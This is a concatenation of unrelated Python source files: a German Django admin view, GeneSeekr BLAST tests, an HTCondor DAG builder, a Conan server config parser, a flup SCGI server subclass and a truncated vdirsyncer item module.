send_mail("Deaktivieren dein Account", message="Grund zum Deaktivieren: '%s'" % message_for_ban,
html_message="<html><h3>um Deinen Account zu wieder aktivieren, kontaktieren Sie bitte :</h3>" +
"<a href='%s'>Klicke hier um den Account wieder zu aktivieren!</a>." +
"</html>", from_email="AccountAktivierung@vps146949.ovh.net",
recipient_list=(user_to_be_ban.email,))
messages.info(request, "Der Benutzer ist deaktiviert")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
@login_required
def setIgnoreReport(request, report_id):
if not (request.user.is_superuser):
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
try:
report = Report.objects.get(pk=report_id)
except:
messages.error(request, "Report existiert nicht")
return HttpResponseRedirect(reverse("admin_frontpage"))
report.closed = True
report.valid = False
report.issuer = request.user
report.save()
messages.success(request, "Report wurde ignoriert")
return HttpResponseRedirect(reverse("admin_frontpage"))
| |
#!/usr/bin/env python 3
from accessoryFunctions.accessoryFunctions import MetadataObject
from geneseekr.geneseekr import GeneSeekr
from geneseekr.blast import BLAST
import multiprocessing
from glob import glob
from time import time
import pytest
import os
test_path = os.path.abspath(os.path.dirname(__file__))
__author__ = 'adamkoziol'
@pytest.fixture()
def variables():
v = MetadataObject()
datapath = os.path.join(test_path, 'testdata')
v.sequencepath = os.path.join(datapath, 'aa_sequences')
v.targetpath = os.path.join(datapath, 'databases', 'resfinder')
v.reportpath = os.path.join(datapath, 'reports')
v.cutoff = 70
v.evalue = '1E-05'
v.align = False
v.unique = False
v.resfinder = False
v.virulencefinder = False
v.numthreads = multiprocessing.cpu_count()
v.start = time()
return v
def variable_update():
global method
method = method_init(variables())
@pytest.fixture()
def method_init(variables, analysistype, program, align, unique):
global method
variables.analysistype = analysistype
variables.program = program
variables.align = align
variables.unique = unique
method = BLAST(variables)
return method
tblastn_method = method_init(variables(), 'resfinder', 'tblastn', True, True)
def test_parser():
assert os.path.basename(tblastn_method.targets[0]) == 'beta-lactam.tfa'
def test_combined_files():
assert os.path.isfile(tblastn_method.combinedtargets)
def test_strains():
assert os.path.isfile(tblastn_method.strains[0])
def test_strain():
assert os.path.basename(tblastn_method.strains[0]) == 'amr_test.fasta'
def test_makeblastdb(variables):
global geneseekr
geneseekr = GeneSeekr()
geneseekr.makeblastdb(fasta=tblastn_method.combinedtargets,
program=tblastn_method.program)
assert os.path.isfile(os.path.join(variables.targetpath, 'combinedtargets.nsq'))
def test_variable_populate():
global targetfolders
global targetfiles
global records
targetfolders, targetfiles, records = \
geneseekr.target_folders(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype)
def test_targetfolders():
assert os.path.basename(list(targetfolders)[0]) == 'resfinder'
def test_targetfiles():
assert targetfiles[0] == tblastn_method.combinedtargets
def test_records():
assert records[targetfiles[0]]['ampH_2_HQ586946']
def test_tblastn(variables):
global tblastn_report
tblastn_method.metadata = geneseekr.run_blast(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype,
program=tblastn_method.program,
outfmt=tblastn_method.outfmt,
evalue=tblastn_method.evalue,
num_threads=tblastn_method.cpus)
tblastn_report = os.path.join(variables.reportpath, 'amr_test_tblastn_resfinder.tsv')
assert os.path.isfile(tblastn_report)
def test_enhance_report_parsing():
geneseekr.parseable_blast_outputs(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype,
fieldnames=tblastn_method.fieldnames,
program=tblastn_method.program)
header = open(tblastn_report).readline()
assert header.split('\t')[0] == 'query_id'
def test_tblastn_results():
with open(tblastn_report) as blast_results:
next(blast_results)
data = blast_results.readline()
results = data.split('\t')
assert int(results[2]) >= 50
def test_blast_parse():
tblastn_method.metadata = geneseekr.unique_parse_blast(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype,
fieldnames=tblastn_method.fieldnames,
cutoff=tblastn_method.cutoff,
program=tblastn_method.program)
for sample in tblastn_method.metadata:
assert sample.resfinder.queryranges['contig2'] == [[1, 264]]
def test_filter():
tblastn_method.metadata = geneseekr.filter_unique(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype)
for sample in tblastn_method.metadata:
assert sample.resfinder.blastlist[0]['percentidentity'] >= 70
def test_dict_create():
tblastn_method.metadata = geneseekr.dict_initialise(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype)
for sample in tblastn_method.metadata:
assert type(sample.resfinder.protseq) is dict
def test_report_creation():
tblastn_method.metadata = geneseekr.resfinder_reporter(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype,
reportpath=tblastn_method.reportpath,
align=tblastn_method.align,
program=tblastn_method.program,
targetpath=tblastn_method.targetpath,
cutoff=tblastn_method.cutoff)
def test_report_existance():
global geneseekr_report
geneseekr_report = os.path.join(tblastn_method.reportpath, 'resfinder_tblastn.xlsx')
assert os.path.isfile(geneseekr_report)
def test_report_row():
for sample in tblastn_method.metadata:
assert sorted(sample.resfinder.sampledata)[0][0] == 'blaOXA'
def test_parse_results():
for sample in tblastn_method.metadata:
assert sample.resfinder.blastresults['blaOXA_427_1_KX827604'] == 94.34
def test_aaseq():
for sample in tblastn_method.metadata:
assert sample.resfinder.blastlist[0]['query_sequence'][:5] == 'MSRIL'
def test_fasta_create(variables):
global fasta_file
geneseekr.export_fasta(metadata=tblastn_method.metadata,
analysistype=tblastn_method.analysistype,
reportpath=tblastn_method.reportpath,
cutoff=tblastn_method.cutoff,
program=tblastn_method.program)
fasta_file = os.path.join(variables.reportpath, 'amr_test_resfinder.fasta')
assert os.path.isfile(fasta_file)
header = open(fasta_file, 'r').readline().rstrip()
assert header == '>amr_test_blaOXA_427_1_KX827604'
def test_combined_targets_clean():
os.remove(tblastn_method.combinedtargets)
def test_makeblastdb_clean(variables):
databasefiles = glob(os.path.join(variables.targetpath, 'combinedtargets.n*'))
for dbfile in databasefiles:
os.remove(dbfile)
def test_remove_tblastn_report():
os.remove(tblastn_report)
def test_remove_fasta_file():
os.remove(fasta_file)
def test_remove_geneseekr_report():
os.remove(geneseekr_report)
def test_remove_report_path():
os.rmdir(tblastn_method.reportpath)
| |
#!/usr/bin/env python
import os
import glob
import time
from . import logger
def checkdir(outfile):
outdir = os.path.dirname(outfile)
if outdir == '':
outdir = os.getcwd()
if not os.path.isdir(outdir):
print('\nThe directory {} doesn\'t exist...'.format(outdir)
+ 'creating it...\n')
os.makedirs(outdir)
return
class CondorExecutable(object):
def __init__(self, name, path, request_memory=None,
request_disk=None, queue=None, lines=None, verbose=0):
self.name = str(name)
self.path = str(path)
self.request_memory = request_memory
self.request_disk = request_disk
self.queue = queue
if lines is None:
lines = []
if isinstance(lines, str):
lines = [lines]
self.lines = lines
# Set up logger
self.logger = logger.setup_logger(self, verbose)
def __repr__(self):
output = 'CondorExecutable(name={}, path={}, request_memory={}, request_disk={}, n_lines={})'.format(
self.name, self.path, self.request_memory, self.request_disk, len(self.lines))
return output
def add_line(self, line):
self.lines.append(str(line))
self.logger.debug(
'Added \'{}\' to lines for CondorExecutable {}'.format(str(line), self.name))
return
def add_lines(self, lines):
if isinstance(lines, str):
lines = [lines]
try:
for line in lines:
self.add_line(line)
except:
raise TypeError('add_lines() is expecting a list of strings')
return
class CondorJob(object):
def __init__(self, name, condorexecutable=None, verbose=0):
self.name = str(name)
self.condorexecutable = condorexecutable
self.args = []
self.parents = []
self.children = []
# Set up logger
self.logger = logger.setup_logger(self, verbose)
def __repr__(self):
output = 'CondorJob(name={}, condorexecutable={}, n_args={}, n_children={}, n_parents={})'.format(
self.name, self.condorexecutable.name, len(self.args),
len(self.children), len(self.parents))
return output
def __iter__(self):
return iter(self.args)
def add_arg(self, arg):
self.args.append(str(arg))
self.logger.debug(
'Added \'{}\' to args for CondorJob {}'.format(str(arg), self.name))
return
def add_args(self, args):
try:
for arg in args:
self.add_arg(arg)
except:
raise TypeError(
'add_args() is expecting a list of argument strings')
return
def _hasparent(self, job):
return job in self.parents
def add_parent(self, job):
# Ensure that job is a CondorJob
if not isinstance(job, CondorJob):
raise TypeError('add_parent() is expecting a CondorJob')
# Don't bother continuing if job is already in the parents
if self._hasparent(job):
return
# Add job to existing parents
self.parents.append(job)
self.logger.debug(
'Added {} to parents for CondorJob {}'.format(job.name, self.name))
# Add this CondorJob instance as a child to the new parent job
job.add_child(self)
return
def add_parents(self, job_list):
# Ensure that job_list is a list of type CondorJob
try:
for job in job_list:
self.add_parent(job)
except:
raise TypeError('add_parents() is expecting a list of CondorJobs')
return
def _haschild(self, job):
return job in self.children
def add_child(self, job):
# Ensure that job is a CondorJob
if not isinstance(job, CondorJob):
raise TypeError('add_child() is expecting a CondorJob')
# Don't bother continuing if job is already in the children
if self._haschild(job):
return
# Add job to existing children
self.children.append(job)
self.logger.debug(
'Added {} to children for CondorJob {}'.format(job.name, self.name))
# Add this CondorJob instance as a parent to the new child job
job.add_parent(self)
return
def add_children(self, job_list):
# Ensure that job_list is a list of type CondorJob
try:
for job in job_list:
self.add_child(job)
except:
raise TypeError('add_children() is expecting a list of CondorJobs')
return
def haschildren(self):
return bool(self.children)
def hasparents(self):
return bool(self.parents)
class DagManager(object):
def __init__(self, name,
condor_data_dir=None, condor_scratch_dir=None, verbose=0):
self.name = str(name)
self.condor_data_dir = condor_data_dir
self.condor_scratch_dir = condor_scratch_dir
self.jobs = []
# Set up logger
self.logger = logger.setup_logger(self, verbose)
def __repr__(self):
output = 'DagManager(name={}, n_jobs={})'.format(self.name,
len(self.jobs))
return output
def __iter__(self):
return iter(self.jobs)
def _hasjob(self, job):
return job in self.jobs
def add_job(self, job):
# Don't bother adding job if it's already in the jobs list
if self._hasjob(job):
return
if isinstance(job, CondorJob):
self.jobs.append(job)
else:
raise TypeError('add_job() is expecting a CondorJob')
self.logger.debug(
'Added {} to jobs for DagManager {}'.format(job.name, self.name))
return
def _get_executables(self):
executable_list = [job.condorexecutable for job in self.jobs]
executable_set = set(executable_list)
return executable_set
def _make_submit_script(self, executable):
# Check that paths/files exist
if not os.path.exists(executable.path):
raise IOError(
'The path {} does not exist...'.format(executable.path))
for directory in ['submit_scripts', 'logs']:
checkdir(self.condor_scratch_dir + '/{}/'.format(directory))
for directory in ['outs', 'errors']:
checkdir(self.condor_data_dir + '/{}/'.format(directory))
jobID = self._getjobID(executable)
condor_script = self.condor_scratch_dir + \
'/submit_scripts/{}.submit'.format(jobID)
lines = ['universe = vanilla\n',
'getenv = true\n',
'executable = {}\n'.format(executable.path),
'arguments = $(ARGS)\n',
'log = {}/logs/{}.log\n'.format(
self.condor_scratch_dir, jobID),
'output = {}/outs/{}.out\n'.format(
self.condor_data_dir, jobID),
'error = {}/errors/{}.error\n'.format(
self.condor_data_dir, jobID),
'notification = Never\n',
'queue \n']
# Re-format lines if queue option specified
if executable.queue:
if not isinstance(executable.queue, int):
raise TypeError('The queue option for CondorExecutable {} is {}, expecting an int'.format(
executable.name, executable.queue))
lines[-1] = 'queue {}\n'.format(executable.queue)
lines[4:7] = ['log = {}/logs/{}_$(Process).log\n'.format(self.condor_scratch_dir, jobID),
'output = {}/outs/{}_$(Process).out\n'.format(
self.condor_data_dir, jobID),
'error = {}/errors/{}_$(Process).error\n'.format(self.condor_data_dir, jobID)]
# Add memory and disk requests, if specified
if executable.request_memory:
lines.insert(-2, 'request_memory = {}\n'.format(executable.request_memory))
if executable.request_disk:
lines.insert(-2, 'request_disk = {}\n'.format(executable.request_disk))
# Add any extra lines to submit file, if specified
if executable.lines:
if isinstance(executable.lines, str):
lines.insert(-2, executable.lines + '\n')
elif isinstance(executable.lines, list):
for line in executable.lines:
lines.insert(-2, line + '\n')
else:
raise TypeError('The lines option for CondorExecutable {} is of type {}, expecting str or list'.format(
executable.name, type(executable.lines)))
with open(condor_script, 'w') as f:
f.writelines(lines)
# Add submit_file data member to job for later use
executable.submit_file = condor_script
return
def _getjobID(self, executable):
jobID = executable.name + time.strftime('_%Y%m%d')
othersubmits = glob.glob(
'{}/submit_scripts/{}_??.submit'.format(self.condor_scratch_dir, jobID))
jobID += '_{:02d}'.format(len(othersubmits) + 1)
return jobID
def build(self):
# Get set of CondorExecutable and write the corresponding submit
# scripts
executable_set = self._get_executables()
for executable in executable_set:
self._make_submit_script(executable)
# Create DAG submit file path
dagID = self._getjobID(self)
dag_file = '{}/submit_scripts/{}.submit'.format(
self.condor_scratch_dir, dagID)
self.submit_file = dag_file
# Write dag submit file
self.logger.info(
'Building DAG submission file {}...'.format(self.submit_file))
with open(dag_file, 'w') as dag:
for job_index, job in enumerate(self, start=1):
self.logger.info('Working on CondorJob {} [{} of {}]'.format(
job.name, job_index, len(self.jobs)))
for i, arg in enumerate(job):
dag.write('JOB {}_p{} '.format(job.name, i) +
job.condorexecutable.submit_file + '\n')
dag.write('VARS {}_p{} '.format(
job.name, i) + 'ARGS="' + arg + '"\n')
# Add parent/child information if necessary
if job.hasparents():
parent_string = 'Parent'
for parentjob in job.parents:
for j, parentarg in enumerate(parentjob):
parent_string += ' {}_p{}'.format(
parentjob.name, j)
child_string = 'Child'
for k, arg in enumerate(job):
child_string += ' {}_p{}'.format(job.name, k)
dag.write(parent_string + ' ' + child_string + '\n')
self.logger.info('DAG submission file successfully built!')
return
def submit(self, maxjobs=3000, **kwargs):
command = 'condor_submit_dag -maxjobs {} {}'.format(
maxjobs, self.submit_file)
for option, value in kwargs.iteritems():
command += ' {} {}'.format(option, value)
os.system(command)
return
def build_submit(self, maxjobs=3000, **kwargs):
self.build()
self.submit(maxjobs, **kwargs)
return
| |
"""
Server's configuration variables
"""
import os
import random
import string
from datetime import timedelta
import six
from six.moves.configparser import ConfigParser, NoSectionError
from conans.client import tools
from conans.errors import ConanException
from conans.paths import conan_expand_user
from conans.server.conf.default_server_conf import default_server_conf
from conans.server.store.disk_adapter import ServerDiskAdapter
from conans.server.store.server_store import ServerStore
from conans.util.env_reader import get_env
from conans.util.files import mkdir, save
from conans.util.log import logger
MIN_CLIENT_COMPATIBLE_VERSION = '0.25.0'
class ConanServerConfigParser(ConfigParser):
""" defines the configuration of the server. It can load
values from environment variables or from file.
Environment variables have PRECEDENCE over file values
"""
def __init__(self, base_folder, environment=None, is_custom_path=False):
environment = environment or os.environ
ConfigParser.__init__(self)
environment = environment or os.environ
self.optionxform = str # This line keeps the case of the key, important for users case
if is_custom_path:
self.conan_folder = base_folder
else:
self.conan_folder = os.path.join(base_folder, '.conan_server')
self.config_filename = os.path.join(self.conan_folder, 'server.conf')
self._loaded = False
self.env_config = {"updown_secret": get_env("CONAN_UPDOWN_SECRET", None, environment),
"authorize_timeout": get_env("CONAN_AUTHORIZE_TIMEOUT", None, environment),
"disk_storage_path": get_env("CONAN_STORAGE_PATH", None, environment),
"jwt_secret": get_env("CONAN_JWT_SECRET", None, environment),
"jwt_expire_minutes": get_env("CONAN_JWT_EXPIRE_MINUTES", None, environment),
"write_permissions": [],
"read_permissions": [],
"ssl_enabled": get_env("CONAN_SSL_ENABLED", None, environment),
"port": get_env("CONAN_SERVER_PORT", None, environment),
"public_port": get_env("CONAN_SERVER_PUBLIC_PORT", None, environment),
"host_name": get_env("CONAN_HOST_NAME", None, environment),
"custom_authenticator": get_env("CONAN_CUSTOM_AUTHENTICATOR", None, environment),
# "user:pass,user2:pass2"
"users": get_env("CONAN_SERVER_USERS", None, environment)}
def _get_file_conf(self, section, varname=None):
""" Gets the section or variable from config file.
If the queried element is not found an exception is raised.
"""
try:
if not os.path.exists(self.config_filename):
jwt_random_secret = ''.join(random.choice(string.ascii_letters) for _ in range(24))
updown_random_secret = ''.join(random.choice(string.ascii_letters) for _ in range(24))
server_conf = default_server_conf.format(jwt_secret=jwt_random_secret,
updown_secret=updown_random_secret)
save(self.config_filename, server_conf)
if not self._loaded:
self._loaded = True
# To avoid encoding problems we use our tools.load
if six.PY3:
self.read_string(tools.load(self.config_filename))
else:
self.read(self.config_filename)
if varname:
section = dict(self.items(section))
return section[varname]
else:
return self.items(section)
except NoSectionError:
raise ConanException("No section '%s' found" % section)
except Exception as exc:
logger.debug(exc)
raise ConanException("Invalid configuration, "
"missing %s: %s" % (section, varname))
@property
def ssl_enabled(self):
try:
ssl_enabled = self._get_conf_server_string("ssl_enabled").lower()
return ssl_enabled == "true" or ssl_enabled == "1"
except ConanException:
return None
@property
def port(self):
return int(self._get_conf_server_string("port"))
@property
def public_port(self):
try:
return int(self._get_conf_server_string("public_port"))
except ConanException:
return self.port
@property
def host_name(self):
try:
return self._get_conf_server_string("host_name")
except ConanException:
return None
@property
def public_url(self):
host_name = self.host_name
ssl_enabled = self.ssl_enabled
protocol_version = "v1"
if host_name is None and ssl_enabled is None:
# No hostname and ssl config means that the transfer and the
# logical endpoint are the same and a relative URL is sufficient
return protocol_version
elif host_name is None or ssl_enabled is None:
raise ConanException("'host_name' and 'ssl_enable' have to be defined together.")
else:
protocol = "https" if ssl_enabled else "http"
port = ":%s" % self.public_port if self.public_port != 80 else ""
return "%s://%s%s/%s" % (protocol, host_name, port, protocol_version)
@property
def disk_storage_path(self):
"""If adapter is disk, means the directory for storage"""
try:
disk_path = self._get_conf_server_string("disk_storage_path")
if disk_path.startswith("."):
disk_path = os.path.join(os.path.dirname(self.config_filename), disk_path)
disk_path = os.path.abspath(disk_path)
ret = conan_expand_user(disk_path)
except ConanException:
# If storage_path is not defined, use the current dir
# So tests use test folder instead of user/.conan_server
ret = os.path.dirname(self.config_filename)
ret = os.path.normpath(ret) # Convert to O.S paths
mkdir(ret)
return ret
@property
def read_permissions(self):
if self.env_config["read_permissions"]:
return self.env_config["read_permissions"]
else:
return self._get_file_conf("read_permissions")
@property
def write_permissions(self):
if self.env_config["write_permissions"]:
return self.env_config["write_permissions"]
else:
return self._get_file_conf("write_permissions")
@property
def custom_authenticator(self):
try:
return self._get_conf_server_string("custom_authenticator")
except ConanException:
return None
@property
def users(self):
def validate_pass_encoding(password):
try:
password.encode('ascii')
except (UnicodeDecodeError, UnicodeEncodeError):
raise ConanException("Password contains invalid characters. "
"Only ASCII encoding is supported")
return password
if self.env_config["users"]:
pairs = self.env_config["users"].split(",")
return {pair.split(":")[0]: validate_pass_encoding(pair.split(":")[1]) for pair in pairs}
else:
tmp = dict(self._get_file_conf("users"))
tmp = {key: validate_pass_encoding(value) for key, value in tmp.items()}
return tmp
@property
def jwt_secret(self):
try:
return self._get_conf_server_string("jwt_secret")
except ConanException:
raise ConanException("'jwt_secret' setting is needed. Please, write a value "
"in server.conf or set CONAN_JWT_SECRET env value.")
@property
def updown_secret(self):
try:
return self._get_conf_server_string("updown_secret")
except ConanException:
raise ConanException("'updown_secret' setting is needed. Please, write a value "
"in server.conf or set CONAN_UPDOWN_SECRET env value.")
def _get_conf_server_string(self, keyname):
""" Gets the value of a server config value either from the environment
or the config file. Values from the environment have priority. If the
value is not defined or empty an exception is raised.
"""
if self.env_config[keyname]:
return self.env_config[keyname]
value = self._get_file_conf("server", keyname)
if value == "":
raise ConanException("no value for 'server.%s' is defined in the config file" % keyname)
return value
@property
def authorize_timeout(self):
return timedelta(seconds=int(self._get_conf_server_string("authorize_timeout")))
@property
def jwt_expire_time(self):
return timedelta(minutes=float(self._get_conf_server_string("jwt_expire_minutes")))
def get_server_store(disk_storage_path, public_url, updown_auth_manager):
disk_controller_url = "%s/%s" % (public_url, "files")
if not updown_auth_manager:
raise Exception("Updown auth manager needed for disk controller (not s3)")
adapter = ServerDiskAdapter(disk_controller_url, disk_storage_path, updown_auth_manager)
return ServerStore(adapter)
| |
import sys
import socket
from io import BytesIO
import logging
import select
import errno
import _thread
from flup.server.scgi import WSGIServer
from flup.server.threadedserver import ThreadedServer
from flup.server.threadpool import ThreadPool
from flup.server.scgi_base import NoDefault, Connection, Request, ProtocolError
class ThreadPoolForCoverage(ThreadPool):
def __init__(self, minSpare=1, maxSpare=5, maxThreads=sys.maxsize, **kw):
super().__init__(minSpare, maxSpare, maxThreads)
self.options = kw
def addJob(self, job, allowQueuing=True):
if not "judgeThreadingRequired" in self.options:
job.run()
if not self.options["judgeThreadingRequired"](job.getEnviron()):
job.run()
else:
self._lock.acquire()
try:
# Maintain minimum number of spares.
while self._idleCount < self._minSpare and \
self._workerCount < self._maxThreads:
self._workerCount += 1
self._idleCount += 1
_thread.start_new_thread(self._worker, ())
# Hand off the job.
if self._idleCount or allowQueuing:
self._workQueue.append(job)
self._lock.notify()
return True
else:
return False
finally:
self._lock.release()
def recvall(sock, length):
"""
Attempts to receive length bytes from a socket, blocking if necessary.
(Socket may be blocking or non-blocking.)
"""
dataList = []
recvLen = 0
while length:
try:
data = sock.recv(length)
except socket.error as e:
if e[0] == errno.EAGAIN:
select.select([sock], [], [])
continue
else:
raise
if not data: # EOF
break
dataList.append(data)
dataLen = len(data)
recvLen += dataLen
length -= dataLen
return b''.join(dataList).decode("ascii"), recvLen
def readNetstring(sock):
"""
Attempt to read a netstring from a socket.
"""
# First attempt to read the length.
size = b""
while True:
try:
c = sock.recv(1)
except socket.error as e:
if e[0] == errno.EAGAIN:
select.select([sock], [], [])
continue
else:
raise
if c == b':':
break
if not c:
raise EOFError
size += c
# Try to decode the length.
try:
size = int(size)
if size < 0:
raise ValueError
except ValueError:
raise ProtocolError('invalid netstring length')
# Now read the string.
s, length = recvall(sock, size)
if length < size:
raise EOFError
# Lastly, the trailer.
trailer, length = recvall(sock, 1)
if length < 1:
raise EOFError
if trailer != ',':
raise ProtocolError('invalid netstring trailer')
return s
class ConnectionForCoverage(Connection):
def __init__(self, sock, addr, server):
super().__init__(sock, addr, server)
self._headers = None
def readHeaders(self):
if self._headers == None:
self._headers = readNetstring(self._sock)
return self._headers
def getEnviron(self):
headers = self.readHeaders()
headers = headers.split('\x00')[:-1]
if len(headers) % 2 != 0:
raise ProtocolError('invalid headers')
environ = {}
for i in range(int(len(headers) / 2)):
environ[headers[2 * i]] = headers[2 * i + 1]
return environ
def processInput(self):
# Read headers
headers = self.readHeaders()
headers = headers.split('\x00')[:-1]
if len(headers) % 2 != 0:
raise ProtocolError('invalid headers')
environ = {}
for i in range(int(len(headers) / 2)):
environ[headers[2 * i]] = headers[2 * i + 1]
clen = environ.get('CONTENT_LENGTH')
if clen is None:
raise ProtocolError('missing CONTENT_LENGTH')
try:
clen = int(clen)
if clen < 0:
raise ValueError
except ValueError:
raise ProtocolError('invalid CONTENT_LENGTH')
self._sock.setblocking(1)
if clen:
input = self._sock.makefile('rb')
else:
# Empty input.
input = BytesIO()
# stdout
output = self._sock.makefile('wb')
# Allocate Request
req = Request(self, environ, input, output)
# Run it.
req.run()
output.close()
input.close()
class ThreadedServerForCoverage(ThreadedServer):
def __init__(self, jobClass=None, jobArgs=(), **kw):
self._jobClass = jobClass
self._jobArgs = jobArgs
self._threadPool = ThreadPoolForCoverage(**kw)
class WSGIServerForCoverage(WSGIServer, ThreadedServerForCoverage):
def __init__(self, application, scriptName=NoDefault, environ=None,
multithreaded=True, multiprocess=False,
bindAddress=('localhost', 4000), umask=None,
allowedServers=None,
loggingLevel=logging.INFO, debug=True, **kw):
WSGIServer.__init__(self, application,
scriptName=scriptName,
environ=environ,
multithreaded=multithreaded,
multiprocess=multiprocess,
bindAddress=bindAddress,
umask=umask,
allowedServers=allowedServers,
loggingLevel=loggingLevel,
debug=debug)
for key in ('jobClass', 'jobArgs'):
if key in kw:
del kw[key]
ThreadedServerForCoverage.__init__(self, jobClass=ConnectionForCoverage, jobArgs=(self,),
**kw)
def run(self):
self.logger.info('%s starting up', self.__class__.__name__)
try:
sock = self._setupSocket()
except socket.error as e:
self.logger.error('Failed to bind socket (%s), exiting', e[1])
return False
ret = ThreadedServerForCoverage.run(self, sock)
self._cleanupSocket(sock)
self.logger.info('%s shutting down%s', self.__class__.__name__,
self._hupReceived and ' (reload requested)' or '')
return ret
def handler(self, request):
"""
WSGI handler. Sets up WSGI environment, calls the application,
and sends the application's response.
"""
environ = request.environ
environ.update(self.environ)
environ['wsgi.version'] = (1, 0)
environ['wsgi.input'] = request.stdin
environ['wsgi.errors'] = sys.stderr
environ['wsgi.multithread'] = self.multithreaded
environ['wsgi.multiprocess'] = self.multiprocess
environ['wsgi.run_once'] = False
if environ.get('HTTPS', 'off') in ('on', '1'):
environ['wsgi.url_scheme'] = 'https'
else:
environ['wsgi.url_scheme'] = 'http'
self._sanitizeEnv(environ)
headers_set = []
headers_sent = []
result = None
def write(data):
if type(data) is str:
data = data.encode("utf8")
#assert type(data) is str, 'write() argument must be string'
assert headers_set, 'write() before start_response()'
if not headers_sent:
status, responseHeaders = headers_sent[:] = headers_set
found = False
for header, value in responseHeaders:
if header.lower() == 'content-length':
found = True
break
if not found and result is not None:
try:
if len(result) == 1:
responseHeaders.append(('Content-Length',
str(len(data))))
except:
pass
s = 'Status: %s\r\n' % status
for header in responseHeaders:
s += '%s: %s\r\n' % header
s += '\r\n'
request.stdout.write(s.encode("utf8"))
request.stdout.write(data)
request.stdout.flush()
def start_response(status, response_headers, exc_info=None):
if exc_info:
try:
if headers_sent:
# Re-raise if too late
raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
finally:
exc_info = None # avoid dangling circular ref
else:
assert not headers_set, 'Headers already set!'
assert type(status) is str, 'Status must be a string'
assert len(status) >= 4, 'Status must be at least 4 characters'
assert int(status[:3]), 'Status must begin with 3-digit code'
assert status[3] == ' ', 'Status must have a space after code'
assert type(response_headers) is list, 'Headers must be a list'
if __debug__:
for name, val in response_headers:
assert type(name) is str, 'Header name "%s" must be a string' % name
assert type(val) is str, 'Value of header "%s" must be a string' % name
headers_set[:] = [status, response_headers]
return write
if not self.multithreaded:
self._appLock.acquire()
try:
try:
result = self.application(environ, start_response)
try:
for data in result:
if data:
write(data)
if not headers_sent:
write(b'') # in case body was empty
finally:
if hasattr(result, 'close'):
result.close()
except socket.error as e:
if e[0] != errno.EPIPE:
raise # Don't let EPIPE propagate beyond server
finally:
if not self.multithreaded:
self._appLock.release()
| |
# -*- coding: utf-8 -*-
import hashlib
from itertools import chain, tee
from . import cached_property, uniq
IGNORE_PROPS = (
# PRODID is changed by radicale for some reason after upload
'PRODID',
# X-RADICALE-NAME is used by radicale, because hrefs don't really exist in
# their filesystem backend
'X-RADICALE-NAME',
# Apparently this is set by Horde?
# https://github.com/pimutils/vdirsyncer/issues/318
'X-WR-CALNAME',
# Those are from the VCARD specification and is supposed to change when the
# item does -- however, we can determine that ourselves
'REV',
'LAST-MODIFIED',
'CREATED',
# Some iCalendar HTTP calendars generate the DTSTAMP at request time, so
# this property always changes when the rest of the item didn't. Some do
# the same with the UID.
#
# - Google's read-only calendar links
# - http://www.feiertage-oesterreich.at/
'DTSTAMP',
'UID',
)
class Item(object):
'''Immutable wrapper class for VCALENDAR (VEVENT, VTODO) and
VCARD'''
def __init__(self, raw):
assert isinstance(raw, str)
self._raw = raw
def with_uid(self, new_uid):
parsed = _Component.parse(self.raw)
stack = [parsed]
while stack:
component = stack.pop()
stack.extend(component.subcomponents)
if component.name in ('VEVENT', 'VTODO', 'VJOURNAL', 'VCARD'):
del component['UID']
if new_uid:
component['UID'] = new_uid
return Item('\r\n'.join(parsed.dump_lines()))
@cached_property
def raw(self):
'''Raw content of the item, as unicode string.
Vdirsyncer doesn't validate the content in any way.
'''
return self._raw
@cached_property
def uid(self):
'''Global identifier of the item, across storages, doesn't change after
a modification of the item.'''
# Don't actually parse component, but treat all lines as single
# component, avoiding traversal through all subcomponents.
x = _Component('TEMP', self.raw.splitlines(), [])
try:
return x['UID'].strip() or None
except KeyError:
return None
@cached_property
def hash(self):
'''Hash of self.raw, used for etags.'''
return hash_item(self.raw)
@cached_property
def ident(self):
'''Used for generating hrefs and matching up items during
synchronization. This is either the UID or the hash of the item's
content.'''
# We hash the item instead of directly using its raw content, because
#
# 1. The raw content might be really large, e.g. when its a contact
# with a picture, which bloats the status file.
#
# 2. The status file would contain really sensitive information.
return self.uid or self.hash
@property
def parsed(self):
'''Don't cache because the rv is mutable.'''
try:
return _Component.parse(self.raw)
except Exception:
return None
def normalize_item(item, ignore_props=IGNORE_PROPS):
'''Create syntactically invalid mess that is equal for similar items.'''
if not isinstance(item, Item):
item = Item(item)
x = _Component('TEMP', item.raw.splitlines(), [])
for prop in IGNORE_PROPS:
del x[prop]
x.props.sort()
return u'\r\n'.join(filter(bool, (line.strip() for line in x.props)))
def hash_item(text):
return hashlib.sha256(normalize_item(text).encode('utf-8')).hexdigest()
def split_collection(text):
assert isinstance(text, str)
inline = []
items = {} # uid => item
ungrouped_items = []
for main in _Component.parse(text, multiple=True):
_split_collection_impl(main, main, inline, items, ungrouped_items)
for item in chain(items.values(), ungrouped_items):
item.subcomponents.extend(inline)
yield u'\r\n'.join(item.dump_lines())
def _split_collection_impl(item, main, inline, items, ungrouped_items):
if item.name == u'VTIMEZONE':
inline.append(item)
elif item.name == u'VCARD':
ungrouped_items.append(item)
elif item.name in (u'VTODO', u'VEVENT', u'VJOURNAL'):
uid = item.get(u'UID', u'')
wrapper = _Component(main.name, main.props[:], [])
if uid.strip():
wrapper = items.setdefault(uid, wrapper)
else:
ungrouped_items.append(wrapper)
wrapper.subcomponents.append(item)
elif item.name in (u'VCALENDAR', u'VADDRESSBOOK'):
for subitem in item.subcomponents:
_split_collection_impl(subitem, item, inline, items,
ungrouped_items)
else:
raise ValueError('Unknown component: {}'
.format(item.name))
_default_join_wrappers = {
u'VCALENDAR': u'VCALENDAR',
u'VEVENT': u'VCALENDAR',
u'VTODO': u'VCALENDAR',
u'VCARD': u'VADDRESSBOOK'
}
def join_collection(items, wrappers=_default_join_wrappers):
'''
:param wrappers: {
item_type: wrapper_type
}
'''
items1, items2 = tee((_Component.parse(x)
for x in items), 2)
item_type, wrapper_type = _get_item_type(items1, wrappers)
wrapper_props = []
def _get_item_components(x):
if x.name == wrapper_type:
